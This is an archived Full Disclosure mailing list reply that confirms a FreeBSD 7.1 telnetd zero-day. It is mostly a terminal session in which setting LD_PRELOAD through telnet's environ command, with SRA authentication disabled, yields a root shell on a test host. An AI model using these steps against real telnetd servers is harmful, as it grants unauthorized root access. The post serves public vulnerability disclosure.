Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: FreeBSD zeroday
From: don bailey <don.bailey () gmail com>
Date: Sat, 14 Feb 2009 15:48:16 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Confirmed on 7.1-RELEASE, latest update:

%id
uid=100(donb) gid=127(beastie) groups=127(beastie),0(wheel)
%telnet
telnet> auth disable SRA
telnet> environ define LD_PRELOAD /tmp/libno_ex.so.1.0
telnet> open beastie
Trying 172.16.95.104...
Connected to beastie.testdrive.kernelspace.net.
Escape character is '^]'.

FreeBSD/i386 (beastie.testdrive.kernelspace.n) (ttyp5)

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -r
7.1-RELEASE
#

Even though no-one should be running telnetd this is a pretty cool bug.
Nice find, holmes.

D

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAkmXSi8ACgkQttfe3HwtctPrdwCeP+Z27V+NCOdaMNkcKvEtj1Nk
WWwAoKkyecDvbPWWfReJ/AC9Z89JyQLX
=uLkX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: FreeBSD zeroday don bailey (Feb 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]